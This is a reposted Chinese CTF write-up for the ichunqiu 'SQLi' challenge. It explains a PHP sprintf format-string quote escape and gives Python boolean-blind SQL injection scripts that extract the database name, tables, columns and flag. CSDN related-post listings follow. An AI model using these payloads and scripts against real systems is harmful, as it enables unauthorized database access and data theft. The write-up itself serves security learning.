迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

最新推荐文章于 2020-11-14 10:47:18 发布
最新推荐文章于 2020-11-14 10:47:18 发布
阅读量152 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/Ragd0ll/p/8745597.html
版权

看题目应该就是注入没跑了

先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户

拿常规注入语句试探一下admin' and 1=1%23,发生了报错

 

红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞

具体原理可以参考下面这篇文章

sprintf格式化字符串带来的注入隐患

先按照文中的方法拿admin%1$\' and 1=1%23进行尝试

 

结果返回了username error!,照一开始的测试来说,若and 1=1执行成功应该会返回password error!这里猜测and被和谐了

接着换成or语句试试

 

可以看到这里or语句被成功执行了,接下来就是盲注的时间了(就希望他后面别再过滤啥关键字了)

 先看当前数据库的长度:

#coding:utf-8

import requests
import string



dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
for i in range(30):
    key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    if right in str(r):
        print('the length of database is %s' %i)

import requests
import string



dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

database = ''
for j in range(1,4):
    for each in dic:
        key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            database += each
            print(each)
            break
print('the name of database is %s'%database)

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
i = 1
while True:
    key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(r)
    if right in str(r):
        print('the length of tables is %s' %i)
        break
    i += 1

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://335ba99138724fb9938bd2756b0c7ba5aba7efad86a84ab9.game.ichunqiu.com/'
table = ''
for i in range(1,5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            table += j
            print(j)
            break
print('the name of table is %s'%table)

接下来的代码我就省略前面定义url、dic这些东西,直接给出判断语句(其实判断语句也很简单,拿着上面跑表的语句改改就好了)

i = 1
while True:
    key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(r)
    if right in str(r):
        print('the length of columns is %s' %i)
        break
    i += 1

column = ''
for i in range(1,5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            column += j
            print(j)
            break
print('the name of column is %s'%column)

i = 1
while True:
    key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(key)
    if right in str(r):
        print('the length of data is %s' %i)
        break
    i += 1

flag = ''
for i in range(1,43):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            flag += j
            print(j)
            break
print('the flag is %s'%flag)

这题的关键还是要知道sprintf格式化字符的漏洞,后面的盲注并没有过滤相关的关键词,导致盲注起来没有压力

 

转载于:https://www.cnblogs.com/Ragd0ll/p/8745597.html

a173262565
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
圣诞拿大奖活动赛题 Web-SQLi
qq_34106499的博客
01-17 546
1. php中sprintf()函数漏洞原理及其利用; 2. mysql盲注语法及python脚本; 3. sqlmap的需要进一步学习;
sqli-labs Basic Challenges Less6
守卫者安全
03-28 207
延续上一篇文章讲的报错注入,这里再介绍三种其他形式的报错注入。分别是extractvalue()报错注入、updatexml()报错注入以及exp()报错注入。在此之前我们需要对这几个函数有一个大致的了解。 1、extractvalue()函数 Mysql 5.1.5版本中添加了extractvalue()函数来对xml文档进行查询。 函数的语法如下: extractvalue(XML_d...
ctf每日练习-第四天
想变得强大,虽然现在还弱不禁风
09-05 247
今天的内容主要是sqli,好几天没写首先因为这几天刚开学事情比较多,二是因为这几天一直都在学习,刷题反而不是很多,今天和同学去图书馆学了一波,感觉收获很大。 easy_sql(来自攻防世界web进阶区) 题目链接: easy_sql. 首先我们尝试一个单引号,报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
ctf-writeup-圣诞拿大奖-SQLi
key_nothing的博客
08-06 345
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 题目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
圣诞拿大奖活动赛题 SQLi
feng的博客
10-02 294
这题的新姿势就是利用sprintf格式化字符串漏洞来实现SQL注入。
"圣诞拿大奖"赛题——SQLI
Ramona的博客
12-22 657
0x01 本题所需知识清单: 1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
SQLi Dumper v.8.3_sqli_
09-30
SQLi Dumper v.8.3_sqli_ 是一个专门针对SQL注入漏洞的渗透测试工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的...
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
Vega_sqli_源码
10-04
sqli tool for searching vulnarabiliti for your website
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
arm_linux_sqlite.rar_compiler for linux_cross compile_linux sqli
09-22
Compile SQLite using the cross-compiler such as arm-linux-gcc first, get sqlite-3.3.6.tar.gz from ...unzip it, #tar -zxvf sqlite-3.3.6.tar.gz change into the sqlite-3.3.6 directory cd sqlite-3.3.6
圣诞拿大奖活动赛题------------SQLi
大方子
08-29 1404
========================================= 个人收获 1.sprintf 格式漏洞   =========================================   题目     上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了   开始想尝试 万能密码 后来发现有过滤 尝试用...
SQLPLUS 教程
xzg58753795的专栏
09-27 1287
1.1.1结构查询语言SQLSQL语言是一种使用方便灵活的语言,因为它是一种非过程化程度相当高的语言,使用这种语言编程,用户只需在程序中指出要干什么,至于如何干,用户不必在程序中指出,而由系统来决定完成。SQL语言可以通过两种方式使用,一种是命令方式,另一种是程序方式。采用命令方式时,用户通过交互来执行该命令。SQL语言还可以嵌入C,COBOL和FORTRAN等高级语言中,组成一个完整的程
什么是SQL注入(SQLi)
Tybyqi的博客
11-29 2724
什么是SQL注入? SQL注入(SQLi)通常被认为是一种注入攻击,其中攻击者可以执行恶意SQL语句。它控制Web应用程序的数据库服务器。由于SQL注入无助可能会影响使用基于SQL数据库的任何站点或Web应用程序。弱点是最成熟,最普遍和最危险的Web应用程序漏洞之一。 通过使用SQL注入无助,在给定正确条件的情况下,攻击者可以使用它来回避Web应用程序的验证和批准组件并恢复整个数据库的实质内...
[圣诞拿大奖] Sqli writeup
Flyour的博客
03-31 1053
Sqli 的writeup 拿到题目看到的就是一个登录框,可以根据经验进行尝试一下用户名=amdin,密码=admin,得到的结果是password error。然后随便换一个其他的名字进行登录,发现得到的结果是username error。从这里可以看到响应结果会反映出是用户名出错,还是密码出错。 然后尝试进行注入,试了万能密码等注入,结果一直是username error。一开始我以为是w...
CTF-“圣诞拿大奖活动赛题SQLi
路漫漫其修远
07-26 303
分值:200分 类型:Web题目名称:SQLi 题目内容:find the flag. 解题步骤 进入链接,发现是个登录页面,没有注册的地方,填入admin&admin,提示password error! 分析报文,无异常 intruder一遍,发现username是admin%时报错 image.png 显然是sprintf格式化问题导致单引号逃逸 尝试各种字符串后,...
[复现]ichunqiu“圣诞拿大奖活动赛题-web-SQLi
baola的博客
11-14 235
sprintf字符串逃逸漏洞实现sql注入
圣诞拿大奖赛题——SQLI(附sprintf格式化字符串安全问题超详解)
g1ut_t0ny的博客
07-03 287
"圣诞拿大奖"赛题——SQLI 0x00题目 结合题目给出的“SQLI”与页面,正常思路是SQL注入,尝试用admin账户登陆,提示password error,证明有admin用户存在,那么就对username进行注入,尝试弱口令 0x01发现注入点 开始在username处进行常规注入,考虑万能密码,所以直接使用burpsuit的intruder跑一下,查看那些字母或者字符没有被过滤掉(waf字典),但发现带有%的response中返回长度不一样,查看回显发现提示 构造username=admin
宏景 get_org_tree-sqli
最新发布
11-30
宏景 get_org_tree-sqli是一种SQL注入攻击。在宏景软件的get_org_tree函数中,存在着未经过滤或者验证的用户输入,导致攻击者可以通过构造恶意的SQL查询语句来对数据库进行未授权的访问和操作。 当应用程序没有正确...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值